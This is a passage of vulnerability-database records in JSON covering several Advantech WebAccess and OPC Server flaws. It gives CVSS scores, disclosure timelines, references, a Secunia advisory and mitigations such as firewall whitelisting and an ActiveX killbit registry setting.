that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-142", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-142", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-142", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll NodeName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ], "trust": 0.7 } }
var-201708-1719
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-535", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-535", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4092", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-535", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ] }, "id": "VAR-201708-1719", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:59:57.204000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-535", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-535", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-535", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT CreateSound Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-535" } ], "trust": 0.7 } }
var-201805-0169
Vulnerability from variot
Advantech WebAccess 8.1 and earlier contains a DLL hijacking vulnerability which may allow an attacker to run a malicious DLL file within the search path resulting in execution of arbitrary code. Advantech WebAccess Contains a vulnerability related to uncontrolled search path elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A DLL hijacking vulnerability exists in Advantech WebAccess 8.1 and earlier. Advantech WebAccess is prone to a local arbitrary code-execution vulnerability because it fails to sanitize user-supplied input. Advantech WebAccess 8.1 and prior are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0169", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "BID", "id": "96210" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-013424" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Li MingZheng Kuangn", "sources": [ { "db": "BID", "id": "96210" } ], "trust": 0.3 }, "cve": "CVE-2017-5175", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-5175", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 6.6, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CNVD-2017-02043", "impactScore": 9.2, "integrityImpact": "COMPLETE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 6.6, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343", "impactScore": 9.2, "integrityImpact": "COMPLETE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:N/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-113378", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-5175", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-5175", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-5175", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-02043", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201702-609", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-113378", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2017-5175", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "VULHUB", "id": "VHN-113378" }, { "db": "VULMON", "id": "CVE-2017-5175" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.1 and earlier contains a DLL hijacking vulnerability which may allow an attacker to run a malicious DLL file within the search path resulting in execution of arbitrary code. Advantech WebAccess Contains a vulnerability related to uncontrolled search path elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A DLL hijacking vulnerability exists in Advantech WebAccess 8.1 and earlier. Advantech WebAccess is prone to a local arbitrary code-execution vulnerability because it fails to sanitize user-supplied input. \nAdvantech WebAccess 8.1 and prior are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-5175" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "BID", "id": "96210" }, { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "VULHUB", "id": "VHN-113378" }, { "db": "VULMON", "id": "CVE-2017-5175" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-5175", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-17-045-01", "trust": 3.5 }, { "db": "BID", "id": "96210", "trust": 2.1 }, { "db": "CNNVD", "id": "CNNVD-201702-609", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-02043", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-013424", "trust": 0.8 }, { "db": "IVD", "id": "E867D17F-0F33-4C9B-9B45-EE5B53126343", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-113378", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2017-5175", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "VULHUB", "id": "VHN-113378" }, { "db": "VULMON", "id": "CVE-2017-5175" }, { "db": "BID", "id": "96210" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "id": "VAR-201805-0169", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "VULHUB", "id": "VHN-113378" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" } ] }, "last_update_date": "2024-11-23T22:30:27.152000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Advantech WebAccess DLL hijacking vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/89770" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=68206" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-427", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113378" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.2, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-01" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/96210" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5175" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5175" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-045-01 " }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/427.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "VULHUB", "id": "VHN-113378" }, { "db": "VULMON", "id": "CVE-2017-5175" }, { "db": "BID", "id": "96210" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" }, { "db": "VULHUB", "id": "VHN-113378" }, { "db": "VULMON", "id": "CVE-2017-5175" }, { "db": "BID", "id": "96210" }, { "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "db": "CNNVD", "id": "CNNVD-201702-609" }, { "db": "NVD", "id": "CVE-2017-5175" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-02-26T00:00:00", "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "date": "2017-02-26T00:00:00", "db": "CNVD", "id": "CNVD-2017-02043" }, { "date": "2018-05-09T00:00:00", "db": "VULHUB", "id": "VHN-113378" }, { "date": "2018-05-09T00:00:00", "db": "VULMON", "id": "CVE-2017-5175" }, { "date": "2017-02-14T00:00:00", "db": "BID", "id": "96210" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "date": "2017-02-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201702-609" }, { "date": "2018-05-09T19:29:00.247000", "db": "NVD", "id": "CVE-2017-5175" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-02-26T00:00:00", "db": "CNVD", "id": "CNVD-2017-02043" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-113378" }, { "date": "2019-10-09T00:00:00", "db": "VULMON", "id": "CVE-2017-5175" }, { "date": "2017-03-07T03:03:00", "db": "BID", "id": "96210" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-013424" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201702-609" }, { "date": "2024-11-21T03:27:12.220000", "db": "NVD", "id": "CVE-2017-5175" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "96210" }, { "db": "CNNVD", "id": "CNNVD-201702-609" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess DLL Hijacking vulnerability", "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNVD", "id": "CNVD-2017-02043" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Code problem", "sources": [ { "db": "IVD", "id": "e867d17f-0f33-4c9b-9b45-ee5b53126343" }, { "db": "CNNVD", "id": "CNNVD-201702-609" } ], "trust": 0.8 } }
var-201202-0221
Vulnerability from variot
Advantech/BroadWin WebAccess before 7.0 allows remote attackers to cause a denial of service (memory corruption) via a modified stream identifier to a function. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0221", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19bfb8b4-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0673" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001559" }, { "db": 